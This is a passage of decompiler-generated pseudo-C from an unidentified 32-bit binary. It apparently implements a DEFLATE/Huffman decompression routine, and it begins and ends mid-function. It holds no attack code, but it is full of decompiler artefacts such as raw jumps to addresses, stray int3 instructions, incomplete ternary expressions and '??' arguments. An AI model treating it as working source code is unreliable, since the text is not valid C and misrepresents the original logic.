					if(__ebx >=  *(_t1066 - 0x20)) {
						break;
					}
					L1:
					_t872 = __esi;
					_t846 = __ebx + 1;
					_t987 = __edx | ( *__ebx & 0x000000ff) << __esi;
					 *(_t1066 - 0x18) = _t846;
					_t1064 = __esi + 8;
					 *(_t1066 - 4) = _t987;
					if(_t1064 < 0xf) {
						L227:
						_t646 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
						 *(_t1066 - 0x24) = _t646;
						__eflags = _t646;
						if(_t646 < 0) {
							L231:
							__eflags = _t1064 - 0xa;
							if(_t1064 <= 0xa) {
								continue;
							} else {
								L232:
								L233:
								 *(_t1066 - 0x1c) = _t872;
								while(1) {
									L234:
									_t872 =  *((short*)(_t1029 + 0x1700 + ((_t987 >> _t872 & 0x00000001) +  !( *(_t1066 - 0x24))) * 2));
									_t652 =  *(_t1066 - 0x1c) + 1;
									 *(_t1066 - 0x24) = _t872;
									 *(_t1066 - 0x1c) = _t652;
									__eflags = _t872;
									if(_t872 >= 0) {
										goto L2;
									}
									L235:
									__eflags = _t1064 - _t652 + 1;
									if(_t1064 < _t652 + 1) {
										goto L0;
									} else {
										L236:
										_t872 =  *(_t1066 - 0x1c);
										continue;
									}
									goto L295;
								}
								goto L2;
							}
						} else {
							L228:
							_t845 = _t646 >> 9;
							__eflags = _t845;
							if(_t845 == 0) {
								continue;
							} else {
								L229:
								__eflags = _t1064 - _t845;
								if(_t1064 >= _t845) {
									goto L2;
								} else {
									L230:
									continue;
								}
							}
						}
					} else {
						while(1) {
							L2:
							_t655 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
							 *(_t1066 - 0x1c) = _t655;
							if(_t655 < 0) {
								goto L4;
							}
							L3:
							_t872 = _t655 >> 9;
							_t660 = _t655 & 0x000001ff;
							L8:
							_t988 = _t987 >> _t872;
							_t1050 = _t1064 - _t872;
							_t875 =  *(0x411090 + _t660 * 4);
							_t595 =  *(0x411110 + _t660 * 4);
							 *(_t1066 - 4) = _t988;
							 *(_t1066 - 0x38) = _t875;
							 *(_t1066 - 0x28) = _t595;
							if(_t875 == 0) {
								L14:
								_t877 =  *(_t1066 - 0x10) -  *((intOrPtr*)(_t1066 + 0xc));
								 *((intOrPtr*)(_t1066 - 0x48)) = _t877;
								if(_t595 <= _t877 || ( *(_t1066 + 0x18) & 0x00000004) == 0) {
									L16:
									_t1029 =  *(_t1066 - 0x14);
									_t880 = (_t877 - _t595 &  *(_t1066 - 0x34)) +  *((intOrPtr*)(_t1066 + 0xc));
									 *(_t1066 - 0xc) = _t880;
									_t662 =  >  ?  *(_t1066 - 0x10) : _t880;
									_t881 =  *(_t1066 - 8);
									_t663 = ( >  ?  *(_t1066 - 0x10) : _t880) + _t881;
									_t1081 = ( >  ?  *(_t1066 - 0x10) : _t880) + _t881 -  *((intOrPtr*)(_t1066 - 0x40));
									if(( >  ?  *(_t1066 - 0x10) : _t880) + _t881 <=  *((intOrPtr*)(_t1066 - 0x40))) {
										L20:
										__eflags = _t881 - 9;
										if(_t881 < 9) {
											L29:
											goto 0x4212f7;
											asm("int3");
											do {
												L31:
												_t881 = _t881 - 3;
												 *_t1029 =  *_t988 & 0x000000ff;
												 *((char*)(_t1029 + 1)) =  *(_t988 + 1) & 0x000000ff;
												_t666 =  *(_t988 + 2) & 0x000000ff;
												_t988 = _t988 + 3;
												 *(_t1029 + 2) = _t666;
												_t1029 = _t1029 + 3;
												__eflags = _t881 - 2;
											} while (_t881 > 2);
											 *(_t1066 - 0x10) = _t1029;
											_t1029 =  *(_t1066 - 0x14);
											 *(_t1066 - 0xc) = _t988;
											_t988 =  *(_t1066 - 4);
											 *(_t1066 - 8) = _t881;
											__eflags = _t881;
											if(_t881 > 0) {
												L33:
												goto 0x42130b;
												asm("int3");
												_t827 =  *_t666;
												 *_t1029 = _t827;
												_t1029 =  *(_t1066 - 0x14);
												__eflags = _t881 - 1;
												if(_t881 > 1) {
													goto L35;
												}
												goto L37;
											}
										} else {
											L21:
											__eflags = _t881 -  *(_t1066 - 0x28);
											if(_t881 >  *(_t1066 - 0x28)) {
												goto L29;
											} else {
												L22:
												_t1049 =  *(_t1066 - 0xc);
												_t964 =  *(_t1066 - 0x10);
												_t831 = (_t881 & 0xfffffff8) + _t1049;
												 *(_t1066 - 0x24) = _t831;
												_t1026 = _t831;
												do {
													L23:
													 *_t964 =  *_t1049;
													_t833 =  *((intOrPtr*)(_t1049 + 4));
													_t1049 = _t1049 + 8;
													 *((intOrPtr*)(_t964 + 4)) = _t833;
													_t964 = _t964 + 8;
													__eflags = _t1049 - _t1026;
												} while (_t1049 < _t1026);
												_t988 =  *(_t1066 - 4);
												 *(_t1066 - 0x10) = _t964;
												_t881 =  *(_t1066 - 8) & 0x00000007;
												 *(_t1066 - 0xc) = _t1049;
												_t1029 =  *(_t1066 - 0x14);
												 *(_t1066 - 8) = _t881;
												__eflags = _t881 - 3;
												if(_t881 >= 3) {
													goto L29;
												} else {
													L25:
													__eflags = _t881;
													if(_t881 != 0) {
														L26:
														goto 0x4212e3;
														asm("int3");
														_t827 =  *_t833;
														 *_t1029 = _t827;
														_t1029 =  *(_t1066 - 0x14);
														__eflags = _t881 - 1;
														if(_t881 > 1) {
															L28:
															L35:
															goto 0x42131f;
															asm("int3");
															 *(_t988 + 1) =  *((intOrPtr*)(_t827 + 1));
															_t988 =  *(_t1066 - 4);
														}
														L37:
														_t83 = _t1066 - 0x10;
														 *_t83 =  *(_t1066 - 0x10) + _t881;
														__eflags =  *_t83;
													}
												}
											}
										}
										goto L38;
									} else {
										while(1) {
											L17:
											_t834 = _t881;
											_t881 = _t881 - 1;
											 *(_t1066 - 8) = _t881;
											if(_t834 == 0) {
												goto L38;
											}
											L18:
											if( *(_t1066 - 0x10) >=  *((intOrPtr*)(_t1066 - 0x40))) {
												L238:
												 *(_t1066 - 0xc) = 2;
												 *_t1029 = 0x35;
												goto L292;
											} else {
												L19:
												 *(_t1066 - 0x10) =  *(_t1066 - 0x10) + 1;
												 *((intOrPtr*)(_t1066 - 0x48)) =  *((intOrPtr*)(_t1066 - 0x48)) + 1;
												 *( *(_t1066 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1066 - 0x48)) -  *(_t1066 - 0x28) &  *(_t1066 - 0x34)) +  *((intOrPtr*)(_t1066 + 0xc))));
												_t988 =  *(_t1066 - 4);
												continue;
											}
											goto L295;
										}
										while(1) {
											L38:
											_t883 =  *(_t1066 - 0x20) - _t846;
											__eflags = _t883 - 4;
											if(_t883 < 4) {
												goto L57;
											}
											L39:
											_t1029 =  *(_t1066 - 0x14);
											__eflags =  *((intOrPtr*)(_t1066 - 0x40)) -  *(_t1066 - 0x10) - 2;
											if( *((intOrPtr*)(_t1066 - 0x40)) -  *(_t1066 - 0x10) < 2) {
												goto L57;
											} else {
												L40:
												__eflags = _t1050 - 0xf;
												if(_t1050 < 0xf) {
													_t1002 =  *(_t846 + 1) & 0x000000ff;
													_t883 = _t1050;
													_t724 =  *_t846 & 0x000000ff;
													_t846 = _t846 + 2;
													 *(_t1066 - 0x18) = _t846;
													 *(_t1066 - 4) =  *(_t1066 - 4) | (_t1002 << 0x00000008 | _t724) << _t883;
													_t1050 = _t1050 + 0x10;
													__eflags = _t1050;
													_t988 =  *(_t1066 - 4);
												}
												_t595 =  *((short*)(_t1029 + 0x160 + (_t988 & 0x000003ff) * 2));
												 *(_t1066 - 8) = _t595;
												__eflags = _t595;
												if(_t595 < 0) {
													L44:
													goto 0x421333;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L45:
														_t711 = _t988 >> _t883;
														_t883 = _t883 + 1;
														_t595 = (_t711 & 0x00000001) +  !_t846;
														_t846 =  *((short*)(_t1029 + 0x960 + _t595 * 2));
														__eflags = _t846;
													} while (_t846 < 0);
													 *(_t1066 - 8) = _t846;
													_t846 =  *(_t1066 - 0x18);
												} else {
													L43:
													_t883 = _t595 >> 9;
												}
												L47:
												_t987 = _t988 >> _t883;
												_t1064 = _t1050 - _t883;
												_t884 =  *(_t1066 - 8);
												 *(_t1066 - 4) = _t987;
												__eflags = _t884 & 0x00000100;
												if((_t884 & 0x00000100) != 0) {
													L83:
													_t885 = _t884 & 0x000001ff;
													 *(_t1066 - 8) = _t885;
													__eflags = _t885 - 0x100;
													if(_t885 != 0x100) {
														L219:
														_t673 = _t885 * 4 - 0x404;
														_t872 =  *(_t673 + 0x411010);
														_t595 =  *(_t673 + 0x411a48);
														 *(_t1066 - 0x38) = _t872;
														 *(_t1066 - 8) = _t595;
														__eflags = _t872;
														if(_t872 == 0) {
															L225:
															__eflags = _t1064 - 0xf;
															if(_t1064 >= 0xf) {
																L2:
																_t655 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
																 *(_t1066 - 0x1c) = _t655;
																if(_t655 < 0) {
																	goto L4;
																}
																goto L8;
															} else {
																L226:
																__eflags =  *(_t1066 - 0x20) - _t846 - 2;
																if( *(_t1066 - 0x20) - _t846 >= 2) {
																	L237:
																	_t989 =  *(_t846 + 1) & 0x000000ff;
																	_t676 =  *_t846 & 0x000000ff;
																	_t846 = _t846 + 2;
																	_t1029 =  *(_t1066 - 0x14);
																	_t872 = _t1064;
																	 *(_t1066 - 0x18) = _t846;
																	 *(_t1066 - 4) =  *(_t1066 - 4) | _t989 << _t1064 + 0x00000008 | _t676 << _t872;
																	_t1064 = _t1064 + 0x10;
																	_t987 =  *(_t1066 - 4);
																	do {
																		goto L2;
																	} while (_t1064 >= 0xf);
																	goto L226;
																} else {
																	goto L227;
																}
															}
														} else {
															L220:
															__eflags = _t1064 - _t872;
															if(_t1064 >= _t872) {
																L223:
																L224:
																_t1064 = _t1064 - _t872;
																_t680 = (_t595 << _t872) - 0x00000001 & _t987;
																_t987 = _t987 >> _t872;
																_t456 = _t1066 - 8;
																 *_t456 =  *(_t1066 - 8) + _t680;
																__eflags =  *_t456;
																 *(_t1066 - 4) = _t987;
																goto L225;
															} else {
																while(1) {
																	L221:
																	__eflags = _t846 -  *(_t1066 - 0x20);
																	if(_t846 >=  *(_t1066 - 0x20)) {
																		break;
																	}
																	L222:
																	_t595 = ( *_t846 & 0x000000ff) << _t1064;
																	_t846 = _t846 + 1;
																	_t872 =  *(_t1066 - 0x38);
																	_t987 = _t987 | _t595;
																	_t1050 = _t1064 + 8;
																	 *(_t1066 - 0x18) = _t846;
																	 *(_t1066 - 4) = _t987;
																	__eflags = _t1050 - _t872;
																	if(_t1050 < _t872) {
																		continue;
																	} else {
																		goto L223;
																	}
																	goto L295;
																}
																L262:
																 *_t1029 = 0x19;
																goto L285;
															}
														}
													} else {
														while(1) {
															L84:
															__eflags =  *(_t1029 + 0x14) & 0x00000001;
															if(( *(_t1029 + 0x14) & 0x00000001) != 0) {
																break;
															}
															L85:
															__eflags = _t1064 - 3;
															if(_t1064 >= 3) {
																L88:
																_t1050 = _t1064 - 3;
																_t693 = _t987 & 0x00000007;
																_t997 = _t987 >> 3;
																 *(_t1029 + 0x14) = _t693;
																_t694 = _t693 >> 1;
																__eflags = _t694;
																 *(_t1066 - 4) = _t997;
																 *(_t1066 - 0x1c) = _t1050;
																 *(_t1029 + 0x18) = _t694;
																if(_t694 != 0) {
																	L123:
																	__eflags = _t694 - 3;
																	if(_t694 == 3) {
																		L266:
																		 *(_t1066 - 0xc) = 0xffffffff;
																		 *_t1029 = 0xa;
																		goto L292;
																	} else {
																		L124:
																		__eflags = _t694 - 1;
																		if(_t694 != 1) {
																			L127:
																			_t897 = 0;
																			__eflags = 0;
																			while(1) {
																				L128:
																				 *(_t1066 - 8) = _t897;
																				__eflags = _t897 - 3;
																				if(_t897 >= 3) {
																					break;
																				}
																				L129:
																				_t595 =  *((char*)(_t897 + 0x411004));
																				 *(_t1066 - 0x1c) = _t595;
																				__eflags = _t1050 - _t595;
																				if(_t1050 >= _t595) {
																					L132:
																					_t1024 = _t1029 + _t897 * 4;
																					_t1043 =  *(_t1066 - 4);
																					 *(_t1024 + 0x2c) = (0x00000001 <<  *(_t1066 - 0x1c)) - 0x00000001 & _t1043;
																					_t806 =  *(_t1066 - 8);
																					_t936 =  *((char*)(_t806 + 0x411004));
																					_t1044 = _t1043 >> _t936;
																					_t1050 = _t1050 - _t936;
																					_t937 = _t806;
																					 *(_t1066 - 4) = _t1044;
																					 *(_t1066 - 0x1c) = _t1050;
																					 *(_t1024 + 0x2c) =  *(_t1024 + 0x2c) +  *((intOrPtr*)(0x411a38 + _t937 * 4));
																					_t997 = _t1044;
																					_t1029 =  *(_t1066 - 0x14);
																					_t897 = _t937 + 1;
																					continue;
																				} else {
																					while(1) {
																						L130:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L131:
																						_t809 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t897 =  *(_t1066 - 8);
																						_t997 = _t997 | _t809;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 0x18) = _t846;
																						 *(_t1066 - 4) = _t997;
																						_t595 =  *((char*)(_t897 + 0x411004));
																						 *(_t1066 - 0x1c) = _t595;
																						__eflags = _t1050 - _t595;
																						if(_t1050 < _t595) {
																							continue;
																						} else {
																							goto L132;
																						}
																						goto L295;
																					}
																					L248:
																					 *_t1029 = 0xb;
																					goto L285;
																				}
																				goto L295;
																			}
																			L133:
																			L134:
																			_t595 = memset(_t1029 + 0x1b80, 0, ??);
																			_t998 =  *(_t1066 - 4);
																			_t1068 = _t1068 + 0xc;
																			_t898 = 0;
																			__eflags = 0;
																			while(1) {
																				L135:
																				 *(_t1066 - 8) = _t898;
																				__eflags = _t898 -  *((intOrPtr*)(_t1029 + 0x34));
																				if(_t898 >=  *((intOrPtr*)(_t1029 + 0x34))) {
																					break;
																				}
																				L136:
																				__eflags = _t1050 - 3;
																				if(_t1050 >= 3) {
																					L139:
																					_t932 = _t998 & 0x00000007;
																					_t998 = _t998 >> 3;
																					_t1050 = _t1050 - 3;
																					 *(_t1066 - 4) = _t998;
																					 *(_t1066 - 0x1c) = _t1050;
																					_t595 =  *( *(_t1066 - 8) + 0x411a24) & 0x000000ff;
																					 *(_t1029 + 0x1b80 + _t595) = _t932;
																					_t898 =  *(_t1066 - 8) + 1;
																					continue;
																				} else {
																					while(1) {
																						L137:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L138:
																						_t595 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t998 = _t998 | _t595;
																						 *(_t1066 - 0x18) = _t846;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 4) = _t998;
																						__eflags = _t1050 - 3;
																						if(_t1050 < 3) {
																							continue;
																						} else {
																							goto L139;
																						}
																						goto L295;
																					}
																					L249:
																					 *_t1029 = 0xe;
																					goto L285;
																				}
																				goto L295;
																			}
																			L140:
																			 *((intOrPtr*)(_t1029 + 0x34)) = 0x13;
																			goto L141;
																		} else {
																			L125:
																			goto 0x4213af;
																			asm("int3");
																			asm("int3");
																			 *((intOrPtr*)(_t694 + 0x2c)) = 0x120;
																			L126:
																			_t811 = _t694 + 1 - 0x20;
																			 *_t811 =  *_t811 + _t811;
																			_t846 = _t846 + _t811;
																			_t812 = _t811 + 1;
																			 *_t812 =  *_t812 ^ _t812;
																			 *_t812 = _t812 +  *_t812;
																			 *0xde0 =  *0xde0 + _t812;
																			memset(_t812, ??, ??);
																			asm("movdqa xmm0, [0x411ae0]");
																			_t1068 = _t1068 + 0xc;
																			asm("movdqu [edi+0x40], xmm0");
																			asm("movdqu [edi+0x50], xmm0");
																			asm("movdqu [edi+0x60], xmm0");
																			asm("movdqu [edi+0x70], xmm0");
																			asm("movdqu [edi+0x80], xmm0");
																			asm("movdqu [edi+0x90], xmm0");
																			asm("movdqu [edi+0xa0], xmm0");
																			asm("movdqu [edi+0xb0], xmm0");
																			asm("movdqu [edi+0xc0], xmm0");
																			_t1045 = _t1029 + 0xd0;
																			asm("movdqa xmm0, [0x411af0]");
																			asm("movdqu [edi], xmm0");
																			asm("movdqu [edi+0x10], xmm0");
																			asm("movdqu [edi+0x20], xmm0");
																			asm("movdqu [edi+0x30], xmm0");
																			asm("movdqu [edi+0x40], xmm0");
																			asm("movdqu [edi+0x50], xmm0");
																			asm("movdqu [edi+0x60], xmm0");
																			asm("movdqa xmm0, [0x411ad0]");
																			asm("movdqu [edi+0x70], xmm0");
																			asm("movq [edi+0x80], xmm0");
																			 *((intOrPtr*)(_t1045 + 0x88)) = 0x8080808;
																			 *((intOrPtr*)(_t1045 + 0x8c)) = 0x8080808;
																			_t1029 =  *(_t1066 - 0x14);
																			while(1) {
																				L141:
																				_t696 =  *(_t1029 + 0x18);
																				__eflags = _t696;
																				if(_t696 < 0) {
																					break;
																				}
																				L142:
																				 *(_t1066 - 0xc) = 0x40 + _t696 * 0xda0 + _t1029;
																				memset(_t1066 - 0xd0, 0, 0x40);
																				memset( *(_t1066 - 0xc) + 0x120, 0, 0x800);
																				memset( *(_t1066 - 0xc) + 0x920, 0, 0x480);
																				_t899 = 0;
																				_t1068 = _t1068 + 0x24;
																				_t1012 = _t1029 + ( *(_t1029 + 0x18) + 0xb) * 4;
																				 *(_t1066 - 0x44) = _t1012;
																				__eflags =  *_t1012;
																				if( *_t1012 > 0) {
																					L143:
																					_t1029 =  *(_t1066 - 0xc);
																					do {
																						L144:
																						_t799 =  *(_t899 + _t1029) & 0x000000ff;
																						_t899 = _t899 + 1;
																						 *((intOrPtr*)(_t1066 + _t799 * 4 - 0xd0)) =  *((intOrPtr*)(_t1066 + _t799 * 4 - 0xd0)) + 1;
																						__eflags = _t899 -  *_t1012;
																					} while (_t899 <  *_t1012);
																				}
																				L145:
																				goto 0x4213d7;
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				L146:
																				 *(_t1066 - 0x8c) = _t899;
																				 *(_t1066 - 0x90) = _t899;
																				 *(_t1066 - 0x2c) = _t899;
																				 *(_t1066 - 0x30) = _t899;
																				do {
																					L147:
																					_t736 =  *((intOrPtr*)(_t1066 + _t1012 - 0xd4));
																					_t901 = _t899 + _t736 + _t899 + _t736;
																					_t1029 = _t1029 + _t736;
																					_t737 =  *((intOrPtr*)(_t1066 + _t1012 - 0xd0));
																					 *(_t1066 - 0x30) =  *(_t1066 - 0x30) + _t737;
																					 *((intOrPtr*)(_t1066 + _t1012 - 0x90)) = _t901;
																					_t738 =  *((intOrPtr*)(_t1066 + _t1012 - 0xcc));
																					_t903 = _t901 + _t737 + _t901 + _t737;
																					 *(_t1066 - 0x2c) =  *(_t1066 - 0x2c) + _t738;
																					 *((intOrPtr*)(_t1066 + _t1012 - 0x8c)) = _t903;
																					_t899 = _t903 + _t738 + _t903 + _t738;
																					 *(_t1066 + _t1012 - 0x88) = _t899;
																					_t1012 = _t1012 + 0xc;
																					__eflags = _t1012 - 0x40;
																				} while (_t1012 <= 0x40);
																				 *(_t1066 - 0x4c) = _t899;
																				 *(_t1066 - 0x24) = _t1029;
																				_t1029 =  *(_t1066 - 0x14);
																				_t906 =  *(_t1066 - 0x24) +  *(_t1066 - 0x2c) +  *(_t1066 - 0x30);
																				__eflags =  *(_t1066 - 0x4c) - 0x10000;
																				if( *(_t1066 - 0x4c) == 0x10000) {
																					L150:
																					_t741 =  *(_t1066 - 0x44);
																					 *(_t1066 - 0x30) = 0xffffffff;
																					 *(_t1066 - 0x4c) = 0;
																					__eflags =  *_t741;
																					if( *_t741 > 0) {
																						L151:
																						_t1065 =  *(_t1066 - 0x4c);
																						do {
																							L152:
																							L153:
																							_t918 =  *(_t1065 + _t741) & 0x000000ff;
																							 *(_t1066 - 0x44) = _t918;
																							__eflags = _t918;
																							if(_t918 != 0) {
																								L154:
																								_t778 =  *(_t1066 + _t918 * 4 - 0x90);
																								 *(_t1066 - 0x2c) = _t778;
																								 *(_t1066 + _t918 * 4 - 0x90) = _t778 + 1;
																								 *(_t1066 - 0x24) = _t918;
																								__eflags = _t918;
																								if(_t918 != 0) {
																									L155:
																									do {
																										L156:
																										 *(_t1066 - 0x2c) =  *(_t1066 - 0x2c) >> 1;
																										_t798 =  *(_t1066 - 0x24) - 1;
																										_t1012 = _t1012 + _t1012 |  *(_t1066 - 0x2c) & 0x00000001;
																										 *(_t1066 - 0x24) = _t798;
																										__eflags = _t798;
																									} while (_t798 != 0);
																									_t918 =  *(_t1066 - 0x44);
																								}
																								L158:
																								__eflags = _t918 - 0xa;
																								if(_t918 > 0xa) {
																									L164:
																									_t782 =  *(_t1066 - 0xc) + 0x120 + (_t1012 & 0x000003ff) * 2;
																									_t846 =  *(_t1066 - 0x30);
																									 *(_t1066 - 0x44) = _t782;
																									_t783 =  *_t782;
																									 *(_t1066 - 0x2c) = _t783;
																									__eflags = _t783;
																									if(_t783 == 0) {
																										 *( *(_t1066 - 0x44)) = _t846;
																										_t783 = _t846;
																										_t846 = _t846 - 2;
																										__eflags = _t846;
																										 *(_t1066 - 0x2c) = _t783;
																										 *(_t1066 - 0x30) = _t846;
																									}
																									L166:
																									_t1020 = _t1012 >> 9;
																									__eflags = _t918 - 0xb;
																									if(_t918 > 0xb) {
																										L167:
																										_t919 = _t918 + 0xfffffff5;
																										__eflags = _t919;
																										 *(_t1066 - 0x24) = _t919;
																										_t920 =  *(_t1066 - 0x2c);
																										do {
																											L168:
																											_t1020 = _t1020 >> 1;
																											_t788 = 0x48f - _t920 - (_t1020 & 0x00000001);
																											_t923 =  *( *(_t1066 - 0xc) + 0x91e) & 0x0000ffff;
																											__eflags = _t923;
																											if(_t923 != 0) {
																												_t920 = _t923;
																											} else {
																												 *( *(_t1066 - 0xc) + _t788 * 2) = _t846;
																												_t789 =  *(_t1066 - 0x30);
																												_t920 = _t789;
																												_t790 = _t789 - 2;
																												 *(_t1066 - 0x30) = _t790;
																												_t846 = _t790;
																											}
																											L171:
																											_t361 = _t1066 - 0x24;
																											 *_t361 =  *(_t1066 - 0x24) - 1;
																											__eflags =  *_t361;
																										} while ( *_t361 != 0);
																										 *(_t1066 - 0x2c) = _t920;
																										_t783 = _t920;
																									}
																									L173:
																									_t1012 = (_t1020 >> 0x00000001 & 0x00000001) - _t783;
																									__eflags = _t1012;
																									 *( *(_t1066 - 0xc) + 0x91e + _t1012 * 2) = _t1065;
																								} else {
																									L159:
																									_t795 = (_t918 << 0x00000009 | _t1065) & 0x0000ffff;
																									 *(_t1066 - 0x44) = _t795;
																									__eflags = _t1012 - 0x400;
																									if(_t1012 < 0x400) {
																										L160:
																										goto 0x421401;
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										L161:
																										_t796 = _t795 << _t918;
																										 *(_t1066 - 0x4c) = _t796 + _t796;
																										_t928 =  *(_t1066 - 0xc) + _t1012 * 2 + 0x120;
																										__eflags = _t928;
																										do {
																											L162:
																											 *_t928 = _t1029;
																											_t1012 = _t1012 + _t796;
																											_t928 = _t928 +  *(_t1066 - 0x4c);
																											__eflags = _t1012 - 0x400;
																										} while (_t1012 < 0x400);
																										_t1029 =  *(_t1066 - 0x14);
																									}
																								}
																							}
																							L174:
																							_t741 =  *(_t1029 + 0x18);
																							_t1065 = _t1065 + 1;
																							__eflags = _t1065 -  *((intOrPtr*)(_t1029 + 0x2c + _t741 * 4));
																						} while (_t1065 <  *((intOrPtr*)(_t1029 + 0x2c + _t741 * 4)));
																						goto 0x421417;
																						asm("int3");
																					}
																					L176:
																					__eflags =  *(_t1029 + 0x18) - 2;
																					if( *(_t1029 + 0x18) != 2) {
																						L217:
																						 *(_t1029 + 0x18) =  *(_t1029 + 0x18) - 1;
																						continue;
																					} else {
																						L177:
																						_t907 = 0;
																						__eflags = 0;
																						while(1) {
																							L178:
																							_t1013 =  *(_t1066 - 4);
																							while(1) {
																								L179:
																								 *(_t1066 - 8) = _t907;
																								__eflags = _t907 -  *(_t1029 + 0x30) +  *(_t1029 + 0x2c);
																								if(_t907 >=  *(_t1029 + 0x30) +  *(_t1029 + 0x2c)) {
																									break;
																								}
																								L180:
																								__eflags = _t1065 - 0xf;
																								if(_t1065 >= 0xf) {
																									L197:
																									_t756 =  *((short*)(_t1029 + 0x1ca0 + (_t1013 & 0x000003ff) * 2));
																									 *(_t1066 - 0x28) = _t756;
																									__eflags = _t756;
																									if(_t756 < 0) {
																										L199:
																										L200:
																										do {
																											L201:
																											 *(_t1066 - 0x28) =  !( *(_t1066 - 0x28));
																											_t758 = _t1013 >> _t907;
																											_t907 = _t907 + 1;
																											_t595 =  *((short*)(_t1029 + 0x24a0 + ((_t758 & 0x00000001) +  *(_t1066 - 0x28)) * 2));
																											 *(_t1066 - 0x28) = _t595;
																											__eflags = _t595;
																										} while (_t595 < 0);
																									} else {
																										L198:
																										_t907 = _t756 >> 9;
																										_t595 = _t756 & 0x000001ff;
																										 *(_t1066 - 0x28) = _t595;
																									}
																									L202:
																									_t1013 = _t1013 >> _t907;
																									_t1050 = _t1065 - _t907;
																									 *(_t1066 - 4) = _t1013;
																									 *(_t1066 - 0x1c) = _t1050;
																									__eflags = _t595 - 0x10;
																									if(__eflags >= 0) {
																										L204:
																										if(__eflags != 0) {
																											L207:
																											_t908 =  *((char*)(_t595 + 0x410ff0));
																											 *(_t1066 - 0x38) = _t908;
																											__eflags = _t1050 - _t908;
																											if(_t1050 >= _t908) {
																												L211:
																												_t1050 = _t1050 - _t908;
																												 *(_t1066 - 0x1c) = _t1050;
																												_t909 =  *(_t1066 - 0x14);
																												_t1039 = ((0x00000001 << _t908) - 0x00000001 & _t1013) +  *((char*)(_t595 + 0x410ff8));
																												__eflags =  *(_t1066 - 0x28) - 0x10;
																												_t762 =  *(_t1066 - 8);
																												 *(_t1066 - 4) = _t1013 >> _t908;
																												if( *(_t1066 - 0x28) != 0x10) {
																													_t1016 = 0;
																													__eflags = 0;
																												} else {
																													_t1016 =  *(_t762 + _t909 + 0x2923) & 0x000000ff;
																												}
																												L214:
																												memset(_t762 + _t909 + 0x2924, _t1016, _t1039);
																												_t1068 = _t1068 + 0xc;
																												_t907 =  *(_t1066 - 8) + _t1039;
																												_t1029 =  *(_t1066 - 0x14);
																												L178:
																												_t1013 =  *(_t1066 - 4);
																												continue;
																											} else {
																												while(1) {
																													L208:
																													__eflags = _t846 -  *(_t1066 - 0x20);
																													if(_t846 >=  *(_t1066 - 0x20)) {
																														break;
																													}
																													L209:
																													_t595 = ( *_t846 & 0x000000ff) << _t1050;
																													_t846 = _t846 + 1;
																													_t908 =  *(_t1066 - 0x38);
																													_t1013 = _t1013 | _t595;
																													_t1050 = _t1050 + 8;
																													 *(_t1066 - 0x18) = _t846;
																													 *(_t1066 - 4) = _t1013;
																													__eflags = _t1050 - _t908;
																													if(_t1050 < _t908) {
																														continue;
																													} else {
																														L210:
																														_t595 =  *(_t1066 - 0x28);
																														goto L211;
																													}
																													goto L295;
																												}
																												L251:
																												 *_t1029 = 0x12;
																												goto L285;
																											}
																										} else {
																											L205:
																											_t766 =  *(_t1066 - 8);
																											__eflags = _t766;
																											if(_t766 == 0) {
																												L268:
																												_t684 = _t766 | 0xffffffff;
																												 *_t1029 = 0x11;
																												goto L291;
																											} else {
																												L206:
																												_t595 =  *(_t1066 - 0x28);
																												goto L207;
																											}
																										}
																									} else {
																										L203:
																										_t913 =  *(_t1066 - 8);
																										 *(_t1029 + 0x2924 + _t913) = _t595;
																										_t907 = _t913 + 1;
																										continue;
																									}
																								} else {
																									L181:
																									__eflags =  *(_t1066 - 0x20) - _t846 - 2;
																									if( *(_t1066 - 0x20) - _t846 >= 2) {
																										L195:
																										_t1017 =  *(_t846 + 1) & 0x000000ff;
																										_t769 =  *_t846 & 0x000000ff;
																										_t846 = _t846 + 2;
																										_t907 = _t1065;
																										 *(_t1066 - 0x18) = _t846;
																										 *(_t1066 - 4) =  *(_t1066 - 4) | _t1017 << _t1065 + 0x00000008 | _t769 << _t907;
																										_t1065 = _t1065 + 0x10;
																										__eflags = _t1065;
																										_t1013 =  *(_t1066 - 4);
																										goto L196;
																									} else {
																										do {
																											L182:
																											_t595 = _t1013 & 0x000003ff;
																											_t1040 =  *((short*)(_t1029 + 0x1ca0 + _t595 * 2));
																											__eflags = _t1040;
																											if(_t1040 < 0) {
																												L186:
																												__eflags = _t1065 - 0xa;
																												if(_t1065 <= 0xa) {
																													goto L191;
																												} else {
																													L187:
																													L188:
																													 *(_t1066 - 0x24) = _t907;
																													while(1) {
																														L189:
																														_t1040 =  *((short*)( *(_t1066 - 0x14) + 0x24a0 + ((_t1013 >> _t907 & 0x00000001) +  !_t1040) * 2));
																														_t907 =  *(_t1066 - 0x24) + 1;
																														 *(_t1066 - 0x24) = _t907;
																														__eflags = _t1040;
																														if(_t1040 >= 0) {
																															goto L196;
																														}
																														L190:
																														_t595 = _t907 + 1;
																														__eflags = _t1065 - _t595;
																														if(_t1065 >= _t595) {
																															continue;
																														} else {
																															goto L191;
																														}
																														goto L295;
																													}
																													goto L196;
																												}
																											} else {
																												L183:
																												_t1042 = _t1040 >> 9;
																												__eflags = _t1042;
																												if(_t1042 == 0) {
																													L191:
																													_t1029 =  *(_t1066 - 0x14);
																													L192:
																													__eflags = _t846 -  *(_t1066 - 0x20);
																													if(_t846 >=  *(_t1066 - 0x20)) {
																														L250:
																														 *_t1029 = 0x10;
																														goto L285;
																													} else {
																														goto L193;
																													}
																												} else {
																													L184:
																													__eflags = _t1065 - _t1042;
																													if(_t1065 >= _t1042) {
																														L196:
																														_t1029 =  *(_t1066 - 0x14);
																														goto L197;
																													} else {
																														L185:
																														goto L191;
																													}
																												}
																											}
																											goto L295;
																											L193:
